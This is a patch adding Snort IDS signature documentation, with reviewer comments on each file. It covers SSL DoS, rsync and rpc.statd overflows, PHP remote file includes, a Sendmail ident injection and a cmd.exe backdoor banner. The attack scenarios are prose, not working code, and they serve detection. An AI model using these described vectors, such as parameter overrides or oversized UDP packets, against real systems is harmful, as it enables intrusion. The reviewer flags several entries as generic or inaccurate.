+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
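Review bot: the whole file is generic web-server text (no product, vulnerability, URI or request is named, and Additional References is empty), and the same body appears again as 1558.txt in this patch, so an analyst cannot tell what SID 1586 fires on. Detailed Information should at least identify the resource or pattern the rule matches.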
--- /dev/null
+++ b/doc/signatures/2498.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2498
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
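Review bot: Additional References is empty here, while 2539.txt in this patch carries the identical description and cites http://www.us-cert.gov/cas/techalerts/TA04-104A.html; the same reference should be added for 2498. Also "An attcker needs to make" should be "attacker", and the blank line between the Impact text and the following "--" is missing.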
--- /dev/null
+++ b/doc/signatures/2539.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2539
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-CERT:
+http://www.us-cert.gov/cas/techalerts/TA04-104A.html
+
+--
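Review bot: "An attcker needs to make an SSL request" should read "attacker". This file and 2498.txt are otherwise identical apart from the Sid, so one of the two should say what distinguishes the traffic it matches.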
--- /dev/null
+++ b/doc/signatures/2048.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2048
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the rsync daemon (rsyncd).
+
+--
+Impact:
+Serious. Possible theft of data.
+
+--
+Detailed Information:
+rsync is used to synchronize data between two machines across a network.
+It achieves this by only sending the differences between the files on 
+each host.
+
+Since it does not require both hosts to have the data it is 
+synchronizing, it is possible to retrieve a number of files from one 
+host without the corresponding files being present on the receiving 
+host.
+
+This event is generated when an attempt is made to cause a buffer
+overflow condition to occur in the rsync daemon.
+
+--
+Affected Systems:
+	All systems using rsync.
+
+--
+Attack Scenarios:
+The attacker needs to send specially crafted packet data to a host
+running rsyncd.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+Systems using rsync to coordinate sets of data between hosts not in the 
+same LAN.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Access to files via rsync should be carefully managed using access 
+control lists.
+
+The transfer of files from an internal source to an external one should 
+be carefully managed using the appropriate firewall rules.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+rsync Home:
+http://samba.anu.edu.au/rsync/
+
+--
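Review bot: the Impact line ("Serious. Possible theft of data.") does not match Detailed Information, which says the event fires on an attempted buffer overflow in rsyncd; if the rule is for an overflow, Impact should say so (possible code execution as the rsync daemon user), and Corrective Action should include upgrading rsync to a fixed version rather than only ACLs and firewall rules. The False Positives sentence is also hard to parse; suggest "Legitimate rsync transfers between hosts on different networks may trigger this rule."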
--- /dev/null
+++ b/doc/signatures/939.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+939
+
+--
+
+Summary:
+This event is generated when an attempt is made to use a Frontpage 
+client to connect and/or publish content to a Frontpage Server 
+Extensions-enabled IIS web server. 
+
+--
+
+Impact:
+An attacker can modify your web content, access privileged files or 
+modify other users' privileges on the Frontpage-enabled virtual host.
+
+--
+
+Detailed Information:
+Microsoft Frontpage is a web-content managing and publishing 
+application, which also comes with server extensions for Microsoft IIS 
+and Apache web servers. The extensions enable the servers to display 
+dynamic content, as well as perform certain levels of web-server 
+administration.
+
+--
+
+Affected Systems:
+All systems running FPSE on IIS.
+
+--
+
+Attack Scenarios:
+An attacker can gain the FPSE username and password via sniffing, social
+engineering or brute force guessing. After successfully logging on to 
+the system, the attacker can alter web contents, modify login 
+information for other users and generally control the web server.
+
+--
+
+Ease of Attack:
+After gaining the login credentials the attack is trivial. 
+
+--
+
+False Positives:
+If FrontPage authoring is allowed from resources external to the 
+protected network this rule will generate an event.
+
+--
+
+False Negatives:
+not known.
+
+--
+
+Corrective Action:
+Disable FPSE if it is not needed for web-content management.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+eEye Digital Security:
+http://www.eeye.com/html/research/advisories/AD20001222.html
+
+--
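Review bot: Impact presupposes that the attacker already holds FPSE credentials, which is only explained later under Attack Scenarios; since False Positives confirms the rule fires on any external FrontPage authoring request, the Summary or Impact should say that this event marks an authoring connection, not necessarily a compromise. Also "not known." under False Negatives should be "None known." to match the other files.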
--- /dev/null
+++ b/doc/signatures/437.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+437
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Redirect for the Type of Service and Network datagram.
+
+--
+
+Impact:
+Redirect messages are normally an indication that a shorter route to a particular destination exists.  
+
+--
+
+Detailed Information:
+ICMP Redirect messages are generated by gateway devices when a shorter route to the destination exists.  When a gateway device receives an Internet datagram from a host on the same network a check is performed to determine the address of the next hop (gateway) in the route to the datagrams destination.  The datagram is then forward to the next hop on the route.  If this gateway device is also on the same network, the gateway device generates an ICMP Redirect message and sends it back to the host that originally generated the traffic.  The ICMP redirect message informs the original host that a shorter route exists and any additional traffic should be forwarded directly to the closer gateway device.
+
+--
+
+Attack Scenarios:
+Attackers on the local subnet could potentially use ICMP Redirect messages to force hosts to use compromised gateway devices.  
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+ICMP Redirect datagrams are legitimate Internet traffic if a shorter route to a destination actually exists.  
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 5 datagrams
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC792
+
+
+--
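Review bot: this file has no "Affected Systems:" section, which every other signature file in this patch includes; add one (any host that accepts ICMP Redirects). In Detailed Information, "the datagrams destination" should be "the datagram's destination" and "is then forward to" should be "forwarded to". Since Corrective Action refers to ICMP Type 5, the Summary should state the type and code the rule matches, and the "RFC792" reference should be written as "RFC 792" with a link like the other references.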
--- /dev/null
+++ b/doc/signatures/2466.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2466
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
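Review bot: "adminsitrative shares" should read "administrative shares". This file duplicates 2975.txt apart from the Sid; Detailed Information should say which share or request SID 2466 matches so the two entries can be told apart.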
--- /dev/null
+++ b/doc/signatures/620.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+620
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
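Review bot: the Summary, "This event is generated when a scan is detected", does not say what kind of scan or what traffic SID 620 matches, and Detailed Information is equally generic; name the scanner or packet characteristic the rule keys on so the False Positives advice (security audits) can be applied.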
--- /dev/null
+++ b/doc/signatures/1542.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1542
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
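Review bot: "running ona web server" should be "on a web server". The file names no application or URI, so it does not say what SID 1542 actually matches; Detailed Information should identify the CGI script or request pattern the rule looks for, otherwise the "Exploits exist" claim under Ease of Attack has nothing to refer to.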
--- /dev/null
+++ b/doc/signatures/1558.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1558
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
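Review bot: this file is identical to 1586.txt except for the Sid, with no product, URI or reference named; the two entries need distinguishing text in Detailed Information so an analyst can tell which request triggered which SID.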
--- /dev/null
+++ b/doc/signatures/1915.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1915
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a format
+string vulnerability associated with the Remote Procedure Call (RPC)
+rpc.statd.
+
+--
+Impact:
+Remote root access. This may permit execution of arbitrary commands with
+the privileges of root.
+
+--
+Detailed Information:
+The rpc.statd daemon is a component of Network File System (NFS) that
+implements the Network Status and Monitor (NSM) RPC functions.  NSM
+monitors the status of NFS clients and servers and maintains a list of
+hosts that have registered to be notified when an NFS host crashes. 
+There is a format string vulnerability associated with the code that
+implements the monitoring of a given host, possibly permitting the
+execution of arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+	Conectiva Linux 4.0, 4.1, 4.2, 5.0, 5.1
+	Debian Linux 2.2, 2.3
+	Red Hat Linux 6.0, 6.1, 6.2
+	SuSE Linux 6.3, 6.4, 7.0
+	Trustix Secure Linux 1.0, 1.1
+
+--
+Attack Scenarios:
+An attacker can attempt to exploit the format string error allowing
+execution of arbitrary commands with the privileges of root.  
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
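Review bot: Additional References is empty although Ease of Attack states that exploit code is freely available and Affected Systems lists specific vendor releases; the CVE and Bugtraq entries for this rpc.statd format string issue should be added in the same form used in 1752.txt. In Detailed Information, NSM expands to "Network Status Monitor", not "Network Status and Monitor".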
--- /dev/null
+++ b/doc/signatures/2915.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2915
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure switch_snapshot_master
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
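Review bot: the procedure name in Detailed Information is broken across lines with the sentence's period starting a new line ("switch_snapshot_master" / ". This procedure is included in" / "sys.dbms_repcat_sna."); join it into one sentence. "Oracle Oracle9i" under Affected Systems repeats the vendor name, and Additional References is empty for a vulnerability described as a known overflow with a vendor patch.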
--- /dev/null
+++ b/doc/signatures/2341.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+--
+Sid:
+2341
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application DCP-Portal.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+DCP-Portal contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable root when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in a file included from an external source by modifying the
+variable "root" in the editor.php script.
+
+--
+Affected Systems:
+	DCP-Portal 5.0.1
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the root variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
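Review bot: the statement in Detailed Information that the web server user is "usually root" is wrong as a general claim and inflates the Impact; web servers normally run as an unprivileged account, so write "with the privileges of the user running the web server" and leave the privilege level to the deployment. The same paragraph has doubled spaces in "GET or POST  request  to" and names the parameter both as "the variable root" and as "the variable "root"" (quote it consistently). Additional References is empty even though Affected Systems pins a specific version (DCP-Portal 5.0.1), so a reference for the editor.php issue should be added.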
--- /dev/null
+++ b/doc/signatures/100000165.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+100000165
+
+-- 
+Summary: 
+This event is generated when an overly large UDP packet is sent to port 5093, 
+where the Sentinel License Manager service typically listens.
+
+--
+Impact:
+A denial of service will occur, and arbitrary code may be executed with the 
+privileges of the user running the service.
+
+--
+Detailed Information:
+A stack-based buffer overflow exists within the Sentinel License Manager, which 
+will be triggered if 2048 or more characters are received by the service. 
+Authentication is not required, and no specific characters need be present in 
+malicious packets in order to trigger the vulnerability.
+
+--
+Affected Systems:
+SafeNet Sentinel License Manager 7.2.0.2
+
+--
+Attack Scenarios:
+An attacker could use one of the publicly available exploit scripts, or create 
+a script which simply sends 2048 or more random characters to a vulnerable 
+server.
+
+--
+Ease of Attack:
+Simple, as public exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to version 8.0 or above.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+
+--
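Review bot: the "Additional References" heading is missing its trailing colon, unlike every other section header in this file and in the sibling files; fix it so the file matches the format the other signature docs follow. Detailed Information says the overflow triggers on "2048 or more characters" while the Summary only says "overly large UDP packet"; since the trigger is a payload length, state it in bytes and say whether the rule itself matches on that 2048-byte threshold, which also bears on the "None known." False Positives entry. Affected Systems "7.2.0.2" together with Corrective Action "Upgrade to version 8.0 or above" leaves it unclear whether releases between 7.2.0.2 and 8.0 are affected.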
--- /dev/null
+++ b/doc/signatures/1813.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+1813
+
+--
+Summary:
+This event is generated when an ICMP request is made to gain information on available bandwidth.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+An ICMP request is used to elicit information on the bandwidth available on a connection. Digital Island is a company that specializes in content delivery systems.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine the bandwidth available to the host.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP requests.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
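Review bot: Detailed Information introduces "Digital Island" without connecting it to the rule; the Summary says only that "an ICMP request is made to gain information on available bandwidth", so a reader cannot tell that the signature identifies the Digital Island bandwidth probe or what in the ICMP packet it matches on. State explicitly which payload or field identifies the probe. Corrective Action "Block inbound ICMP requests." is broader than this event warrants, since blocking all inbound ICMP also drops messages needed for normal operation; narrow it to ICMP echo requests (as 377.txt in this same patch does) or to the specific probe.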
--- /dev/null
+++ b/doc/signatures/100000736.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000736
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "MassDelTrackback.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "MassDelTrackback.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
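Review bot: the third Detailed Information paragraph (beginning "This event is generated when an attempt is made to gain unauthorized access to a CGI application") is generic credential-validation template text that does not describe a remote file include through the "$_CONF[path]" parameter and sits oddly next to the first paragraph; drop it and keep only the input-validation paragraph. Typos and redundancies in this hunk: "ona web server", "an exploitation attempt has been attempted", "attackers choosing" (attacker's). Formatting differs from the sibling files: two leading blank lines before "Rule:", and no blank line before the "--" separator after Sid, after Affected Systems and after Contributors. Additional References is empty although the script and parameter names are specific enough to cite an advisory.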
--- /dev/null
+++ b/doc/signatures/671.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+671
+
+--
+Summary:
+This event is generated when an external attacker attempts to exploit a vulnerability in Sendmail, where unexpected characters in ident messages are not properly parsed.
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+Sendmail 8.6.10 and earlier versions contain a vulnerability related to the parsing of unexpected characters (in this case, newline characters and a carriage return) in commands passed from ident to Sendmail. An attacker can use a specially crafted command with unexpected characters in an ident response to Sendmail. The message is not properly parsed and Sendmail forwards the response, with included commands, to its queue. The commands are then executed while the message awaits delivery in the Sendmail queue, causing the included arbitrary code to be executed on the server in the security context of Sendmail. 
+
+--
+Affected Systems:
+Systems running unpatched versions of Sendmail 8.6.10 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends an email with newline characters and a carriage return, including a path variable of P=/bin/sh. Directives included in the transmission are executed while the message remains in the Sendmail queue.
+
+--
+Ease of Attack:
+Moderate. Multiple exploits exist, but the window of opportunity is small; the vulnerability must be exploited while the message is queued for delivery and must have sufficient time (the mail server must be busy/slow) to execute the commands.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of Sendmail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0204
+
+Bugtraq
+http://www.securityfocus.com/bid/2311
+
+--
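Review bot: terminology in Detailed Information is inconsistent: it speaks of "commands passed from ident to Sendmail" and then of "an ident response", while Attack Scenarios says "An attacker sends an email"; since the Summary says the trigger is an ident message, all three sections should make clear that the malicious data arrives in the ident response Sendmail receives for the connection, not in the mail body. Impact says "remote root compromise" but Detailed Information says the code runs "in the security context of Sendmail"; these agree only when Sendmail runs as root, which should be stated. Corrective Action "Upgrade to the latest version of Sendmail." should name the first fixed release, given that Affected Systems pins 8.6.10 and earlier.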
--- /dev/null
+++ b/doc/signatures/2123.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 2123
+
+
+--
+Summary:
+This event is generated when a Windows cmd.exe banner is detected in a TCP session. 
+
+--
+Impact:
+Remote access.
+
+--
+Detailed Information:
+This event indicates that a Windows cmd.exe banner has been detected in a TCP session. This indicates that someone has the ability to spawn a DOS command shell prompt over TCP.
+
+--
+Affected Systems:
+Windows operating systems.
+
+--
+Attack Scenarios:
+An attacker could be utilizing a backdoor to spawn a DOS command shell thus gaining access to the operating system and all data on the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
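Review bot: False Positives "None Known." is too strong for a banner match; any legitimately exposed Windows command shell (for example an administrator's telnet session to a Windows host) presents the same cmd.exe banner in a TCP session, so the section should say the rule cannot distinguish an authorized shell from a backdoor and that the session's source, destination and port must be checked before treating it as a compromise. Layout: "Sid: 2123" is on one line, whereas the other files in this patch put the number on the line after "Sid:"; follow the common layout. Additional References is empty and is followed by a stray extra blank line.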
--- /dev/null
+++ b/doc/signatures/1100.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1100
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
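Review bot: nothing in this file says what SID 1100 actually matches; Summary, Detailed Information and Attack Scenarios are the generic web-server template ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion"), so an analyst who receives this alert cannot tell which request pattern or application triggered it or how to tune it. Add at least the URI or content the rule looks for and the product it concerns, and tie "Ease of Attack: Simple. Exploits exist." to that product. Additional References is empty.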
--- /dev/null
+++ b/doc/signatures/100000494.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000494
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Zeroboard" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
